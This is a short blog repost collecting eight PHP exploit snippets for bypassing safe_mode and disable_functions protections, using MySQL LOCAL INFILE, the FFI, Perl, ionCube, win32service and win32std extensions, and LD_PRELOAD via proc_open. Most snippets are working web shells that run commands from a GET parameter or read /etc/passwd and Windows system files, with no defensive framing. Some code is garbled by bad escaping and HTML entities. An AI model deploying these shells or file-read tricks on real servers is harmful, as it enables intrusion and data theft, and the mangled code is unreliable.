zoukankan      html  css  js  c++  java
  • PHP SAFE MODE BYPASS

    1- PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability

    <?php
    file_get_contents('/etc/passwd'); 
    $l = mysql_connect("localhost", "root");
    mysql_query("CREATE DATABASE a");
    mysql_query("CREATE TABLE a.a (a varchar(1024))"); mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'"); mysql_close($l); 
    mysql_connect("localhost", "aaaa");
     mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); $result = mysql_query("SELECT a FROM a.a"); 
    while(list($row) = mysql_fetch_row($result)) 
    print $row . chr(10); 
    
    ?>

    2- MySQL

    <?php
    function r($fp, &$buf, $len, &$err) { 
    print fread($fp, $len);
    } 
    $m = new mysqli('localhost', 'aaaa', '', 'a'); 
    $m->options(MYSQLI_OPT_LOCAL_INFILE, 1); 
    $m->set_local_infile_handler("r"); 
    $m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); $m->close();
     
    ?>

    3- PHP FFI Extension Safe_mode Bypass Exploit

    <?php 
    if(!extension_loaded('ffi')) 
    die('ERROR: FFI extension is not loaded!'); 
    $command=(empty($_GET['cmd']))?'dir':$_GET['cmd']; if(is_writeable(dirname(__FILE__)))
    $tmp=dirname(__  FILE__); elseif(is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path'); elseif(is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir'); 
    else die('ERROR: Move exploit to writeable folder.'); $output="$tmp\".uniqid('NJ'); 
    $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >"$output"",0); while(!file_exists($output))sleep(1); 
    $con=''; $fp=fopen($output,'r'); while(!feof($fp))$con.=fgets($fp,1024); fclose($fp); $con=htmlspecialchars($con); 
    echo "<pre>$con</pre>"; 
    unlink($output); 
    ?>

    4- PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypas

    <?php 
    if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!");
    $path = str_repeat("..\", 20); 
    $MyBoot_readfile = readfile($path."windows\system.ini"); 
    #just to be sure that I set correctely disable_function 

    :)

     
    $MyBoot_ioncube = ioncube_read_file($path."boot.ini"); 
    echo $MyBoot_readfile; 
    echo "<br><br>ionCube output:<br><br>"; 
    echo $MyBoot_ioncube; 
    ?>

    5 – PHP Perl Extension Safe_mode Bypass

    <?php 
    if(!extension_loaded('perl'))die('perl extension is not loaded'); if(!isset($_GET))$_GET=&$HTTP_GET_VARS; 
    if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls  '; 
    $perl=new perl(); 
    echo "<textarea rows='25' cols='75'>"; 
    $perl->eval("system('".$_GET['cmd']."')"); 
    echo "</textarea>"; 
    $_GET['cmd']=htmlspecialchars($_GET['cmd']); 
    echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>" 
    ?>

    6- PHP 5.x (win32service) Local Safe Mode Bypass Exploit

    <?php 
    $command=(isset($_GET['CMD']))?$_GET['CMD']:'dir';
    #cammand 
    $dir=ini_get('upload_tmp_dir'); 
    #Directory to store command's output if(!extension_loaded('win32service'))die('win32ser  vice extension not found!'); 
    $name=$dir."\".uniqid('NJ'); 
    $n=uniqid('NJ'); 
    $cmd=(empty($_SERVER['ComSpec']))?'d:\windows\system32\cmd.exe':$_SERVER['ComSpec']; 
    win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >"$name"")); 
    win32_start_service($n); 
    win32_stop_service($n); 
    win32_delete_service($n); 
    $exec=file_get_contents($name); 
    unlink($name); 
    echo "<pre>".htmlspecialchars($exec)."</pre>"; 
    ?>

    7 – PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass

    <?php 
    if (!extension_loaded("win32std")) die("win32std extension required!"); system("cmd.exe"); 
    //just to be sure that protections work well win_shell_execute("..\..\..\..\windows\system32\cmd.exe"); 
    ?>

    8- PHP safe_mode Bypass via proc_open() and custom environmen

    <?php
    $path="/var/www"; 
    //change to your writable path 
    $a=open($path."/.comm","w"); 
    fputs($a,$_GET["c"]); 
    fclose($a); 
    $descriptorspec = array(  0--> array("pipe", "r"),  1 =&gt; array("file", $path."/output.txt","w"),  2 =&gt; array("file", $path."/errors.txt", "a" ) );
    $cwd = '.'; 
    $env = array('LD_PRELOAD' =&gt; $path."/a.so"); 
    $process = proc_open('id &gt; /tmp/a', $descriptorspec, $pipes, $cwd, $env); 
    // example command - should not succeed sleep(1); $a=fopen($path."/.comm1","r"); 
    echo "<strong>"; 
    while (!feof($a)) {$b=fgets($a);echo $b;} fclose($a);
    ?>
  • 相关阅读:
    实验
    ls -l 详解
    实验
    B
    2.02_Python网络爬虫分类及其原理
    2.01_Python网络爬虫概述
    DA_03_linux网络配置及其远程连接
    DA_01_linux_物理机局域网工作机制
    Hadoop_01_Apache Hadoop概述
    13_Redis_持久化
  • 原文地址:https://www.cnblogs.com/jiancanxuepiao/p/4462630.html
Copyright © 2011-2022 走看看